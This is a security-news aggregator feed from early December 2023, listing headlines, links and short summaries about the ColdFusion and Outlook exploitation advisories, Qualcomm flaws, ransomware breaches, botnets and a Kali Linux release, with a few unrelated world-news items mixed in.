Chipmaker Qualcomm has released more information about three high-severity security flaws that it said came under "limited, targeted exploitation" back in October 2023. The vulnerabilities are as follows - CVE-2023-33063 (CVSS score: 7.8) - Memory corruption in DSP Services during a remote call from HLOS to DSP. CVE-2023-33106 (CVSS score: 8.4) - Memory corruption in


            Threat actors breached US govt systems by exploiting Adobe ColdFusion flaw

            exploits
            2023-12-06 https://securityaffairs.com/155289/security/us-govt-adobe-coldfusion-flaw.html
The U.S. CISA warns that threat actors are actively exploiting a critical vulnerability in Adobe ColdFusion to breach government agencies. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning about threat actors actively exploiting a critical vulnerability (CVE-2023-26360) in Adobe ColdFusion to breach government agencies. The flaw is an Improper Access Control that can allow […]

Autosummary: Pierluigi Paganini, December 06, 2023. The U.S. CISA warns that threat actors are actively exploiting a critical vulnerability in Adobe ColdFusion to breach government agencies.


            21 high-risk vulnerabilities in OT/IoT routers found

            industry
            2023-12-06 https://www.helpnetsecurity.com/2023/12/06/vulnerabilities-ot-iot-routers/

            Forescout detailed the discovery of 21 new vulnerabilities in OT/IoT routers and open-source software elements. The “SIERRA:21 – Living on the Edge” report features research into Sierra Wireless AirLink cellular routers and some open-source components, such as TinyXML and OpenNDS. Sierra Wireless routers are popular — an open database of Wi-Fi networks shows 245,000 networks worldwide running Sierra Wireless for various applications. For example, Sierra Wireless routers are used for police vehicles connecting to a … More


Autosummary: Regions with the highest number of exposed devices include: 68,605 devices in the United States; 5,580 devices in Canada; 3,853 devices in Australia; 2,329 devices in France; 1,001 devices in Thailand. Among the 21 vulnerabilities, one has critical severity (CVSS score 9.6), nine have high severity, and 11 have medium severity.


            Hackers Exploited ColdFusion Vulnerability to Breach Federal Agency Servers

            exploits
            2023-12-06 https://thehackernews.com/2023/12/hackers-exploited-coldfusion.html
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned of active exploitation of a high-severity Adobe ColdFusion vulnerability by unidentified threat actors to gain initial access to government servers. "The vulnerability in ColdFusion (CVE-2023-26360) presents as an improper access control issue and exploitation of this CVE can result in arbitrary code execution,"

Autosummary: "The vulnerability in ColdFusion (CVE-2023-26360) presents as an improper access control issue and exploitation of this CVE can result in arbitrary code execution," CISA said, adding an unnamed federal agency was targeted between June and July 2023.


            Experts demonstrate a post-exploitation tampering technique to display Fake Lockdown mode

            exploits
            2023-12-06 https://securityaffairs.com/155317/security/fake-lockdown-mode.html
Researchers devised a new post-exploitation tampering technique to trick users into believing that their iPhone is in Lockdown Mode. Researchers from Jamf Threat Labs devised a new post-exploit tampering technique to trick users that their compromised iPhone is running in Lockdown Mode while they are performing malicious activities. The researchers pointed out that the issue […]

Autosummary: Pierluigi Paganini, December 06, 2023. Researchers devised a new post-exploitation tampering technique to trick users into believing that their iPhone is in Lockdown Mode.


            Navy contractor Austal USA confirms cyberattack after data leak

            ciber
            2023-12-06 https://www.bleepingcomputer.com/news/security/navy-contractor-austal-usa-confirms-cyberattack-after-data-leak/
Austal USA, a shipbuilding company and a contractor for the U.S. Department of Defense (DoD) and the Department of Homeland Security (DHS), confirmed that it suffered a cyberattack and is currently investigating the impact of the incident. [...]

Autosummary: Hunters International threaten to publish more data stolen from Austal’s systems in the following days, including compliance documents, recruiting information, finance details, certifications, and engineering data.


            Nissan is investigating cyberattack and potential data breach

            financial ciber
            2023-12-06 https://www.bleepingcomputer.com/news/security/nissan-is-investigating-cyberattack-and-potential-data-breach/
Japanese car maker Nissan is investigating a cyberattack that targeted its systems in Australia and New Zealand, which may have let hackers access personal information. [...]


            How IT teams can conduct a vulnerability assessment for third-party applications

            exploits
            2023-12-06 https://www.malwarebytes.com/blog/business/2023/12/how-it-teams-can-conduct-a-vulnerability-assessment-for-third-party-applications
A quick IT guide for conducting a vulnerability assessment.

Autosummary: To simplify security and reduce costs, Vulnerability Assessment deploys easily in minutes without a reboot, using the same agent and cloud-based console that powers all ThreatDown endpoint security technologies. The ThreatDown Vulnerability Assessment tool simplifies the process with features like a lightweight agent, quick vulnerability scans, accurate severity ratings based on CVSS and CISA guidelines, and integration with Security Advisor for tailored recommendations. While manually identifying vulnerabilities in third-party applications is a demanding task, following these structured steps can make the process more manageable.


            Adobe Coldfusion vulnerability used in attacks on government servers

            exploits government
            2023-12-06 https://www.malwarebytes.com/blog/news/2023/12/adobe-coldfusion-vulnerability-used-in-attacks-on-government-servers
CISA has published an advisory about a vulnerability in Adobe Coldfusion used in two attacks against federal agencies.

Autosummary: In the CSA, CISA shares several indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) used in the two attacks. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Prioritize secure-by-default configurations, such as eliminating default passwords and implementing single sign-on (SSO) technology via modern open standards.


            CISA: Adobe ColdFusion flaw leveraged to access government servers (CVE-2023-26360)

            government
            2023-12-06 https://www.helpnetsecurity.com/2023/12/06/cve-2023-26360-government-servers/

            Unknown attackers have leveraged a critical vulnerability (CVE-2023-26360) in the Adobe ColdFusion application development platform to access government servers, the Cybersecurity and Infrastructure Security Agency (CISA) has shared. About the exploited vulnerability CVE-2023-26360 is a deserialization of untrusted data vulnerability that could lead to arbitrary code execution. Adobe disclosed and fixed the flaw in mid-March 2023, and said that it was “aware that CVE-2023-26360 has been exploited in the wild in very limited attacks”. CVE-2023-26360 … More


Autosummary: On June 26, 2023, attackers accessed another public-facing web server running Adobe ColdFusion, and again engaged in reconnaissance: they enumerated running processes, checked network connectivity, collected information about the web server and the OS, and checked for the presence of ColdFusion versions 2018 and 2016.


            CISA adds Qualcomm flaws to its Known Exploited Vulnerabilities catalog

            exploits
            2023-12-06 https://securityaffairs.com/155340/security/cisa-qualcomm-flaws-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds four Qualcomm vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Qualcomm vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Below is the list of the issues added to the catalog: The vendor addressed the flaws CVE-2023-33106, CVE-2023-33107, and CVE-2023-33063 in October 2023. […]


            Mine explosion: Colombian authorities blow up illegal sites

            latam
            2023-12-06 https://www.bbc.co.uk/news/world-latin-america-67644336?at_medium=RSS&at_campaign=KARANGA
Colombia and Brazil destroy 19 illegal gold mining sites and equipment in the Amazon rainforest.


            Russian FSB Cyber Actor Star Blizzard Continues Worldwide Spear-phishing Campaigns

            financial ransomware rusia-ucrania
            2023-12-06 https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-341a

            The Russia-based actor is targeting organizations and individuals in the UK and other geographical areas of interest.

            OVERVIEW

            The Russia-based actor Star Blizzard (formerly known as SEABORGIUM, also known as Callisto Group/TA446/COLDRIVER/TAG-53/BlueCharlie) continues to successfully use spear-phishing attacks against targeted organizations and individuals in the UK, and other geographical areas of interest, for information-gathering activity.

            The UK National Cyber Security Centre (NCSC), the US Cybersecurity and Infrastructure Security Agency (CISA), the US Federal Bureau of Investigation (FBI), the US National Security Agency (NSA), the US Cyber National Mission Force (CNMF), the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the Canadian Centre for Cyber Security (CCCS), and the New Zealand National Cyber Security Centre (NCSC-NZ) assess that Star Blizzard is almost certainly subordinate to the Russian Federal Security Service (FSB) Centre 18.

            Industry has previously published details of Star Blizzard. This advisory draws on that body of information.

            This advisory raises awareness of the spear-phishing techniques Star Blizzard uses to target individuals and organizations. This activity is continuing through 2023.

            To download a PDF version of this advisory, see Russian FSB Cyber Actor Star Blizzard Continues Worldwide Spear-phishing Campaigns.

            TARGETING PROFILE

            Since 2019, Star Blizzard has targeted sectors including academia, defense, governmental organizations, NGOs, think tanks and politicians.

            Tar "

Autosummary: Star Blizzard uses webmail addresses from different providers, including Outlook, Gmail, Yahoo and Proton mail in their initial approach [T1585.002], impersonating known contacts of the target or well-known names in the target’s field of interest or sector. Spear-phishing link: Star Blizzard sends spear-phishing emails with malicious links directly to credential-stealing sites, or to documents hosted on a file-sharing site, which then direct victims to credential-stealing sites.


            Advanced ransomware campaigns expose need for AI-powered cyber defense

            exploits ransomware
            2023-12-05 https://www.helpnetsecurity.com/2023/12/05/carl-froggett-deep-instinct-deep-learning-ai/

            In this Help Net Security interview, Carl Froggett, CIO at Deep Instinct, discusses emerging trends in ransomware attacks, emphasizing the need for businesses to use advanced AI technologies, such as deep learning (DL), for prevention rather than just detection and response. He also talks about the shift in budget priorities in 2024 toward ransomware prevention technologies. He foresees AI, particularly deep learning, becoming more integrated into business processes, automating workflows, and shaping workplace experiences. What … More


Autosummary: In this Help Net Security interview, Carl Froggett, CIO at Deep Instinct, discusses emerging trends in ransomware attacks, emphasizing the need for businesses to use advanced AI technologies, such as deep learning (DL), for prevention rather than just detection and response. Additionally, as AI becomes fully integrated, younger generations won’t have the same hands-on experiences around workplace tasks like troubleshooting, outages, and security incidents, as much of this will be automated by AI. Because DL models understand the building blocks of malicious files, DL makes it possible to implement and deploy a predictive prevention-based security program – one that can predict future malicious behaviors, detecting and preventing unknown threats, ransomware, and zero-days. "


            Russian hacker pleads guilty to Trickbot malware conspiracy

            exploits rusia-ucrania
            2023-12-05 https://www.bitdefender.com/blog/hotforsecurity/russian-hacker-pleads-guilty-to-trickbot-malware-conspiracy/
            A 40-year-old Russian man faces a lengthy prison sentence in the United States after pleading guilty to his involvement in the distribution and development of the notorious Trickbot malware. Read more in my article on the Hot for Security blog. "

            Autosummary: "


            Microsoft Warns of Kremlin-Backed APT28 Exploiting Critical Outlook Vulnerability

            exploits
            2023-12-05 https://thehackernews.com/2023/12/microsoft-warns-of-kremlin-backed-apt28.html
Microsoft on Monday said it detected Kremlin-backed nation-state activity exploiting a critical security flaw in its Outlook email service to gain unauthorized access to victims' accounts within Exchange servers. The tech giant attributed the intrusions to a threat actor it called Forest Blizzard (formerly Strontium), which is also widely tracked under the monikers APT28, "

            Autosummary: The National Cybersecurity Agency of France (ANSSI), in late October, also blamed the hacking outfit for targeting government entities, businesses, universities, research institutes, and think tanks since the second half of 2021 by taking advantage of various flaws, counting CVE-2023-23397, to deploy implants such as CredoMap. "


            Roblox and Twitch provider Tipalti breached by ransomware

            exploits ransomware
            2023-12-05 https://www.malwarebytes.com/blog/news/2023/12/roblox-and-twitch-provider-tipalti-breached-by-ransomware
Accounting software provider Tipalti is investigating ALPHV/BlackCat claims that it was breached. In a typical supply-chain attack, ALPHV is threatening some of their customers, like Roblox and Twitch. "

Autosummary: In what seems to be a typical supply chain attack, ALPHV aka BlackCat are now threatening some Tipalti customers, including Roblox and Twitch: “We are systematically reaching out to affected clients of Tipalti, the first batch (consisting of organizations with the most data exfiltrated), have been sent communications requesting initial contact.” Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "


            Resecurity and ICS Technologies join forces to improve cybersecurity in Iraq

            industry ciber
            2023-12-05 https://www.helpnetsecurity.com/2023/12/05/resecurity-ics-technologies-iraq-partnership/

            Resecurity and ICS Technologies IRAQ, a well-established ICT System Integration Company with HQ in Baghdad, Iraq, have joined forces to fortify cybersecurity, fraud prevention and risk intelligence measures nationwide. This strategic partnership is poised to bring intelligence-driven defensive solutions to Iraq, helping consumers and organizations safeguard their digital assets and combat the evolving threat landscape. Resecurity, headquartered in the United States, is renowned for its innovative cybersecurity products and threat intelligence services. Under the visionary … More

            The post Resecurity and ICS Technologies join forces to improve cybersecurity in Iraq appeared first on Help Net Security.

            "

            Autosummary: Key highlights of the partnership: Advanced cybersecurity solutions: Resecurity, known for its advanced threat intelligence, threat hunting, incident response, and digital risk management solutions, will provide Iraq-based organizations with state-of-the-art cybersecurity tools to protect against a wide range of cyber threats. "


            Hackers breach US govt agencies using Adobe ColdFusion exploit

            exploits
            2023-12-05 https://www.bleepingcomputer.com/news/security/hackers-breach-us-govt-agencies-using-adobe-coldfusion-exploit/
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning about hackers actively exploiting a critical vulnerability in Adobe ColdFusion identified as CVE-2023-26360 to gain initial access to government servers. [...] "

Autosummary: “In both incidents, Microsoft Defender for Endpoint (MDE) alerted of the potential exploitation of an Adobe ColdFusion vulnerability on public-facing web servers in the agency’s pre-production environment” - CISA. The agency notes that “both servers were running outdated versions of software which are vulnerable to various CVEs.” "


            SpyLoan Android malware on Google Play downloaded 12 million times

            exploits
            2023-12-05 https://www.bleepingcomputer.com/news/security/spyloan-android-malware-on-google-play-downloaded-12-million-times/
            More than a dozen malicious loan apps, which are generically named SpyLoan, have been downloaded more than 12 million times this year from Google Play but the count is much larger since they are also available on third-party stores and suspicious websites. [...] "

            Autosummary: Based on data from ESET, SpyLoan detection has increased throughout 2023, the threat being more prominent in Mexico, India, Thailand, Indonesia, Nigeria, Philippines, Egypt, Vietnam, Singapore, Kenya, Colombia, and Peru. "


            Microsoft confirms Windows bug renames printers to HP LaserJet M101-M106

            exploits
            2023-12-05 https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-windows-bug-renames-printers-to-hp-laserjet-m101-m106/
            Microsoft has confirmed an issue causing the HP Smart app to automatically install on Windows systems after all printers are renamed to HP LaserJet M101-M106. [...] "

            Autosummary: "


            Russian hackers use old Outlook vulnerability to target Polish orgs (CVE-2023-23397)

            exploits rusia-ucrania
            2023-12-05 https://www.helpnetsecurity.com/2023/12/05/apt28-poland-cve-2023-23397/

            Russian state-backed hacking group Forest Blizzard (aka Fancy Bear, aka APT28) has been using a known Microsoft Outlook vulnerability (CVE-2023-23397) to target public and private entities in Poland, Polish Cyber Command has warned. Compromising email accounts and maintaining access to them APT28 is known for targeting government, non-governmental, energy and transportation organizations in the US, Europe, and the Middle East. The most recent attacks were detected and reported by the computer security incident response team … More

            The post Russian hackers use old Outlook vulnerability to target Polish orgs (CVE-2023-23397) appeared first on Help Net Security.

            "

            Autosummary: At the time of the release of the patch, CVE-2023-23397 was known to have been leveraged as a zero-day by a Russia-based threat actor “in targeted attacks against a limited number of organizations in government, transportation, energy, and military sectors in Europe.” "


            Veeam Data Platform 23H2 update enhances resilience against ransomware

            exploits ransomware
            2023-12-05 https://www.helpnetsecurity.com/2023/12/05/veeam-data-platform-23h2-update/

Veeam Software released the new Veeam Data Platform 23H2 update, including the Veeam Backup & Replication v12.1 release as well as Veeam ONE v12.1 and Veeam Recovery Orchestrator v7. This latest release from Veeam, with a focus on radical resilience, includes hundreds of new features and enhancements designed to not only protect enterprises’ most critical data, but to enable them with radical resilience to bounce forward from ransomware and cyber-attacks. “The latest Veeam Data Protection Trends Report found … More

            The post Veeam Data Platform 23H2 update enhances resilience against ransomware appeared first on Help Net Security.

            "

            Autosummary: This latest release from Veeam, with a focus on radical resilience, includes hundreds of new features and enhancements designed to not only protect enterprises’ most critical data, but to enable them with radical resilience to bounce forward from ransomware and cyber-attacks. New features and enhancements include: AI-powered built-in Malware Detection Engine performs low-impact inline entropy and file system analysis during backup for immediate detection of ransomware and malicious file management activity. "


            Rambus launches Quantum Safe Engine for data center and government hardware security

            government
            2023-12-05 https://www.helpnetsecurity.com/2023/12/05/rambus-qse/

Rambus has unveiled the availability of a Quantum Safe Engine (QSE) for integration into hardware security elements in ASICs, SoCs and FPGAs. Quantum computers will enable adversaries to break current asymmetric encryption, placing important data and assets at risk. The Rambus QSE IP core uses NIST-selected quantum-resistant algorithms to protect valuable data center and government hardware against attacks emerging in the post-quantum computing era. “From AI, to streaming video, to email, the applications we … More

            The post Rambus launches Quantum Safe Engine for data center and government hardware security appeared first on Help Net Security.

            "

            Autosummary: "


            Russia-linked APT28 group spotted exploiting Outlook flaw to hijack MS Exchange accounts

            exploits
            2023-12-05 https://securityaffairs.com/155254/apt/apt28-outlook-hijack-ms-exchange-accounts.html
            Microsoft warns that the Russia-linked APT28 group is actively exploiting the CVE-2023-23397 Outlook flaw to hijack Microsoft Exchange accounts. Microsoft’s Threat Intelligence is warning of Russia-linked cyber-espionage group APT28 (aka “Forest Blizzard”, “Fancybear” or “Strontium”) actively exploiting the CVE-2023-23397 Outlook flaw to hijack Microsoft Exchange accounts and steal sensitive information. The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, […] "

            Autosummary: Microsoft has identified a Russian-based nation-state threat actor tracked as Forest Blizzard (STRONTIUM, APT28, FANCYBEAR) actively exploiting CVE-2023-23397 to provide secret, unauthorized access to email accounts within Exchange servers: https://t.co/BzbQpELgWQ — Microsoft Threat Intelligence (@MsftSecIntel) December 4, 2023 The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. "


            Kali Linux 2023.4 released with GNOME 45 and 15 new tools

            Linux
            2023-12-05 https://www.bleepingcomputer.com/news/security/kali-linux-20234-released-with-gnome-45-and-15-new-tools/
            Kali Linux 2023.4, the fourth and final version of 2023, is now available for download, with fifteen new tools and the GNOME 45 desktop environment. [...] "

Autosummary: Below are the fifteen new tools added in Kali 2023.4:
cabby - TAXII client implementation
cti-taxii-client - TAXII 2 client library
enum4linux-ng - Next generation version of enum4linux with additional features (a Windows/Samba enumeration tool)
exiflooter - Finds geolocation on all image URLs and directories
h8mail - Email OSINT & Password breach hunting tool
Havoc - Modern and malleable post-exploitation command and control framework
OpenTAXII - TAXII server implementation
PassDetective - Scans shell command history to detect mistakenly written passwords, API keys, and secrets
Portspoof - All 65535 TCP ports are always open & emulates services
Raven - Lightweight HTTP file upload service
ReconSpider - Most Advanced Open Source Intelligence (OSINT) Framework "


            Kali Linux 2023.4 released: New tools, Kali for Raspberry Pi 5, and more!

            Linux
            2023-12-05 https://www.helpnetsecurity.com/2023/12/05/kali-linux-2023-4-released/

            OffSec (previously Offensive Security) has released Kali Linux 2023.4, the latest version of its penetration testing and digital forensics platform. New tools in Kali Linux 2023.4 The list of tools freshly added to Kali Linux includes: cabby – a TAXII client implementation cti-taxii-client – a TAXII 2 client library enum4linux-ng – Next generation version of enum4linux with additional features (a Windows/Samba enumeration tool) exiflooter – Finds geolocation info on all image URLs and directories h8mail … More

            The post Kali Linux 2023.4 released: New tools, Kali for Raspberry Pi 5, and more! appeared first on Help Net Security.

            "

            Autosummary: "


            HTC Global Services confirms cyberattack after data leaked online

            ciber
            2023-12-05 https://www.bleepingcomputer.com/news/security/htc-global-services-confirms-cyberattack-after-data-leaked-online/
            IT services and business consulting company HTC Global Services has confirmed that they suffered a cyberattack after the ALPHV ransomware gang began leaking screenshots of stolen data. [...] "

Autosummary: According to Beaumont, one of HTC's business units, CareTech, operated a vulnerable Citrix Netscaler device, which was exploited for initial access to the company's network. "


Lionel Messi: Argentina forward named Time magazine's Athlete of the Year

            latam
            2023-12-05 https://www.bbc.co.uk/sport/football/67632914?at_medium=RSS&at_campaign=KARANGA
Argentina and Inter Miami forward Lionel Messi is named Time magazine's Athlete of the Year. "

            Autosummary: "


            2024 cybersecurity outlook: The rise of AI voice chatbots and prompt engineering innovations

            ciber
            2023-12-04 https://www.helpnetsecurity.com/2023/12/04/2024-cybersecurity-outlook/

            In their 2024 cybersecurity outlook, WatchGuard researchers forecast headline-stealing hacks involving LLMs, AI-based voice chatbots, modern VR/MR headsets, and more in the coming year. Companies and individuals are experimenting with LLMs to increase operational efficiency. But threat actors are learning how to exploit LLMs for their own malicious purposes as well. During 2024, the WatchGuard Threat Lab predicts that a smart prompt engineer ‒ whether a criminal attacker or researcher ‒ will crack the code … More

            The post 2024 cybersecurity outlook: The rise of AI voice chatbots and prompt engineering innovations appeared first on Help Net Security.

            "

Autosummary: AI-based vishing takes off in 2024. With approximately 3.4 million open cybersecurity jobs, and fierce competition for the talent that is available, more small- to mid-sized companies will turn to trusted managed service and security service providers, known as MSPs and MSSPs, to protect them in 2024. "


            Maximizing cybersecurity on a budget

            ciber
            2023-12-04 https://www.helpnetsecurity.com/2023/12/04/cybersecurity-budget-components-video/

            A cybersecurity budget is an allocation of resources, both financial and otherwise, dedicated to protecting an organization’s digital assets from cyber threats. This includes funds for security software, hardware, training, and personnel. A well-structured cybersecurity budget ensures that an organization is adequately prepared to detect, prevent, and respond to potential cyberattacks, thereby minimizing the risk of data breaches and other security incidents. In this Help Net Security round-up, we present segments from previously recorded videos … More

            The post Maximizing cybersecurity on a budget appeared first on Help Net Security.

            "

            Autosummary: "


            Microsoft Warns of Malvertising Scheme Spreading CACTUS Ransomware

            exploits ransomware
            2023-12-04 https://thehackernews.com/2023/12/microsoft-warns-of-malvertising-scheme.html
            Microsoft has warned of a new wave of CACTUS ransomware attacks that leverage malvertising lures to deploy DanaBot as an initial access vector. The DanaBot infections led to "hands-on-keyboard activity by ransomware operator Storm-0216 (Twisted Spider, UNC2198), culminating in the deployment of CACTUS ransomware," the Microsoft Threat Intelligence team said in a series of posts on X ( "

            Autosummary: "


            LogoFAIL: UEFI Vulnerabilities Expose Devices to Stealth Malware Attacks

            exploits
            2023-12-04 https://thehackernews.com/2023/12/logofail-uefi-vulnerabilities-expose.html
            The Unified Extensible Firmware Interface (UEFI) code from various independent firmware/BIOS vendors (IBVs) has been found vulnerable to potential attacks through high-impact flaws in image parsing libraries embedded into the firmware. The shortcomings, collectively labeled LogoFAIL by Binarly, "can be used by threat actors to deliver a malicious payload and bypass Secure Boot, Intel "

            Autosummary: The flaws affect all major IBVs like AMI, Insyde, and Phoenix as well as hundreds of consumer and enterprise-grade devices from vendors, including Intel, Acer, and Lenovo, making it both severe and widespread. "


            Essequibo: Venezuelans vote to claim Guyana-controlled oil region

            industry
            2023-12-04 https://www.bbc.co.uk/news/world-latin-america-67610200?at_medium=RSS&at_campaign=KARANGA
            Over 95% of voters approve a territorial claim to oil-rich Essequibo, electoral officials say. "

            Autosummary: "


            Booking.com customers targeted in hotel booking scam

            financial
            2023-12-04 https://www.helpnetsecurity.com/2023/12/04/booking-com-hotel-booking-scam/

            Scammers are hijacking hotels’ Booking.com accounts and using them as part of a hotel booking scam aimed at tricking guests into sharing their payment card information. “Customers of multiple properties received email or in-app messages from Booking.com that purported to be from hotel owners requesting confirmation of payment details for upcoming stays,” Secureworks researchers warn. “The threat actors directed the victims to malicious URLs for inputting the information, and then used the details to withdraw … More

            The post Booking.com customers targeted in hotel booking scam appeared first on Help Net Security.

            "

            Autosummary: The first email would set the stage for the ask, and the second one contained the URL to the documents, hosted on legitimate services (Google Drive, Dropbox, Mega, etc.). "


            New P2PInfect Botnet MIPS Variant Targeting Routers and IoT Devices

            industry
            2023-12-04 https://thehackernews.com/2023/12/new-p2pinfect-botnet-mips-variant.html
Cybersecurity researchers have discovered a new variant of an emerging botnet called P2PInfect that's capable of targeting routers and IoT devices. The latest version, per Cado Security Labs, is compiled for Microprocessor without Interlocked Pipelined Stages (MIPS) architecture, broadening its capabilities and reach. "It's highly likely that by targeting MIPS, the P2PInfect developers "

            Autosummary: "


            LockBit on a Roll – ICBC Ransomware Attack Strikes at the Heart of the Global Financial Order

            financial exploits ransomware
            2023-12-04 https://securityaffairs.com/155178/cyber-crime/lockbit-icbc-ransomware-attack.html
The LockBit ransomware attack on the Industrial & Commercial Bank of China demonstrates the weakness of the global financial system to cyberattacks. The ransomware breach that crippled U.S. Treasury trading operations at an American subsidiary of Industrial & Commercial Bank of China Ltd. on November 8 has laid bare the vulnerability of the global financial system […] "

            Autosummary: "


            Update your iPhones! Apple fixes two zero-days in iOS

            exploits
            2023-12-04 https://www.malwarebytes.com/blog/news/2023/12/update-your-iphones-apple-fixes-two-zero-days-in-ios
            Apple has released an emergency security update for two zero-day vulnerabilities which may have already been exploited. "

            Autosummary: "


            CyberAv3ngers hit Unitronics PLCs at multiple US-based water facilities

            industry
            2023-12-04 https://www.helpnetsecurity.com/2023/12/04/cyberav3ngers-unitronics-plcs/

            Iran-affiliated attackers CyberAv3ngers continue to exploit vulnerable Unitronics programmable logic controllers (PLCs), US and Israeli authorities have said in a joint cybersecurity advisory. CyberAv3ngers targeting Unitronics PLCs CISA has recently confirmed that Iran-affiliated attackers took over a Unitronics Vision Series PLC at a water system facility in Pennsylvania, and urged other water authorities to promptly secure their Unitronics PLCs. The agency has advised them to change the default password and port used by the PLC, … More

            The post CyberAv3ngers hit Unitronics PLCs at multiple US-based water facilities appeared first on Help Net Security.

            "

Autosummary: Finally, they called on device manufacturers to do their part in securing OT devices by: not shipping products with default passwords; avoiding the exposure of administrative interfaces to the internet; not imposing additional fees for security features; and making sure the devices support MFA. Other Iran-affiliated threat groups to look out for: CyberAv3ngers are not the only Iranian cyber threat actors targeting Israeli and US entities, Check Point researchers pointed out. "


            Malvertising attacks rely on DanaBot Trojan to spread CACTUS Ransomware

            exploits ransomware
            2023-12-04 https://securityaffairs.com/155184/cyber-crime/danabot-spread-cactus-ransomware.html
Microsoft warns of ongoing malvertising attacks using the DanaBot malware to deploy the CACTUS ransomware. Microsoft uncovered ongoing malvertising attacks using the DanaBot Trojan (Storm-1044) to deploy the CACTUS ransomware. Microsoft attributed the campaign to the ransomware operator Storm-0216 (Twisted Spider, UNC2198). Storm-0216 has historically used Qakbot malware for initial access, but has switched to other […] "

Autosummary: The DanaBot banking Trojan initially targeted users in Australia and Poland, then expanded to other countries, including Italy, Germany, Austria, and, as of September 2018, Ukraine. "


            Russian hackers exploiting Outlook bug to hijack Exchange accounts

            exploits rusia-ucrania
            2023-12-04 https://www.bleepingcomputer.com/news/microsoft/russian-hackers-exploiting-outlook-bug-to-hijack-exchange-accounts/
            Microsoft"s Threat Intelligence team issued a warning earlier today about the Russian state-sponsored actor APT28 (aka "Fancybear" or "Strontium") actively exploiting the CVE-2023-23397 Outlook flaw to hijack Microsoft Exchange accounts and steal sensitive information. [...] "

            Autosummary: In October, the French cybersecurity agency (ANSSI) revealed that the Russian hackers had used the zero-click attack against government entities, businesses, universities, research institutes, and think tanks in France. "


            Tipalti investigates claims of data stolen by ransomware gang

            exploits ransomware
            2023-12-04 https://www.bleepingcomputer.com/news/security/tipalti-investigates-claims-of-data-stolen-by-ransomware-gang/
            Tipalti says they are investigating claims that the ALPHV ransomware gang breached its network and stole 256 GB of data, including data for Roblox and Twitch. [...] "

            Autosummary: The company has numerous well-known customers, including Twitch, Roblox, ZipRecruiter, Roku, GoDaddy, Canva, and X. "Over the past weekend, a ransomware group claimed that they allegedly gained access to confidential information belonging to Tipalti and its customers," Tipalti told BleepingComputer in a statement. "


            Why a ransomware gang tattled on its victim, with Allan Liska: Lock and Code S04E24

            exploits ransomware
            2023-12-04 https://www.malwarebytes.com/blog/podcast/2023/12/why-a-ransomware-gang-tattled-on-its-victim-with-allan-liska-lock-and-code-s04e24
            This week on the Lock and Code podcast, we speak with Allan Liska about why a ransomware group tattled on its own victim, and what to expect next year. "

            Autosummary: “It has come to our attention that MeridianLink, in light of a significant breach compromising customer data and operational information, has failed to file the requisite disclosure under Item 1.05 of Form 8-K within the stipulated four business days, as mandated by the new SEC rules,” wrote ALPHV in a complaint that the group claimed to have filed with the US government. "


            Supply-chain ransomware attack causes outages at over 60 credit unions

            exploits ransomware
            2023-12-04 https://www.tripwire.com/state-of-security/supply-chain-ransomware-attack-causes-outages-over-60-credit-unions
Ransomware hits a firm that provides cloud services to credit unions in order to ensure that their business activities can "operate without interruption, even when nothing else seems to be going well." Read more in my article on the Tripwire State of Security blog. "

            Autosummary: Ongoing Operations - a unit of Trellance, which specialises in disaster recovery and business recovery, providing cloud services to credit unions to ensure that their business activities "operate without interruption, even when nothing else seems to be going well." National Credit Union Administration (NCUA) spokesperson Joseph Adamoli told the media that several credit unions were informed at the start of this month by Ongoing Operations that it had been hit by a ransomware attack. "


            Windows 11 KB5032288 update improves Copilot, fixes 11 bugs

            exploits
            2023-12-04 https://www.bleepingcomputer.com/news/microsoft/windows-11-kb5032288-update-improves-copilot-fixes-11-bugs/
            Microsoft has released the KB5032288 November 2023 Windows 11 preview update with improvements for the Copilot AI assistant and almost a dozen bug fixes. [...] "

Autosummary: Other highlights in this preview update: The Windows 11 KB5032288 optional cumulative release comes with additional improvements and 11 bug fixes, some of the more important ones highlighted below: You might see Windows Spotlight set as the default background in the coming weeks. "


            Stealthier version of P2Pinfect malware targets MIPS devices

            exploits
            2023-12-04 https://www.bleepingcomputer.com/news/security/stealthier-version-of-p2pinfect-malware-targets-mips-devices/
            The latest variants of the P2Pinfect botnet are now focusing on infecting devices with 32-bit MIPS (Microprocessor without Interlocked Pipelined Stages) processors, such as routers and IoT devices. [...] "

            Autosummary: Later, in September, Cado warned about spiking P2Pinfect botnet activity targeting systems in the United States, Germany, the UK, Japan, Singapore, Hong Kong, and China. "


            Tipalti investigates claims of data stolen in ransomware attack

            exploits ransomware
            2023-12-04 https://www.bleepingcomputer.com/news/security/tipalti-investigates-claims-of-data-stolen-in-ransomware-attack/
            Tipalti says they are investigating claims that the ALPHV ransomware gang breached its network and stole 256 GB of data, including data for Roblox and Twitch. [...] "

            Autosummary: The company has numerous well-known customers, including Twitch, Roblox, ZipRecruiter, Roku, GoDaddy, Canva, and X. "Over the past weekend, a ransomware group claimed that they allegedly gained access to confidential information belonging to Tipalti and its customers," Tipalti told BleepingComputer in a statement. "


            New P2PInfect bot targets routers and IoT devices

            industry
            2023-12-04 https://securityaffairs.com/155206/malware/p2pinfect-bot-routers-iot-devices.html
            Cybersecurity researchers discovered a new variant of the P2PInfect botnet that targets routers and IoT devices. Researchers at Cado Security Labs discovered a new variant of the P2Pinfect botnet that targets routers, IoT devices, and other embedded devices. This variant has been compiled for the Microprocessor without Interlocked Pipelined Stages (MIPS) architecture. The new bot supports updated […] "

